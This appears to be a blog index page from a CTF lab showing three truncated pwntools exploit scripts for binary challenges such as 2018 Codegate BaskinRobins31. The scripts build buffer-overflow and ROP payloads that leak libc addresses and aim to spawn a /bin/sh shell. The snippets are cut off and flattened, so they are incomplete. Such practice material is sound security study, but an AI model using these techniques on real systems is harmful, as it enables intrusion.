9oat's LAB
123456789101112131415161718192021222324252627282930313233343536373839404142434445from pwn import * b = '/home/goat/PROB/2018 Codegate/BaskinRobins31'elf = ELF(b)c = process(b) pppr = p64(0x40087a) # pop rdi, pop rsi, pop rdx write_plt = elf.plt['write']write_got = elf.got['write']read_plt = elf.plt['read']strtoul_got = elf.got['strtoul'] pay = ''pay += 'A'*0xb8pay += pppr # leak write's libc add..
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970from pwn import * def smtm(s): s.send('show me the marimo\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") def mod(s,pay,sel): s.send('V\n') s.recvuntil(">>") s.send(sel) s.recvuntil(">>") s.send('M\n') s.recvuntil(">>") s.sen..
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556from pwn import * s = remote("127.0.0.1", 8888) pppr = p32(0x806f280) # edx ecx ebxeax = p32(0x8048882)int80 = p32(0x806f870)bss = p32(0x80ea3d0)binsh = "/bin/sh"print "[*] Start" s.recvuntil(": ")s.send("2\n")s.recvuntil(") ")s.send("y\n")s.recvuntil(".\n")s.send(("a"*64)+"x")s.recvn(68) canar..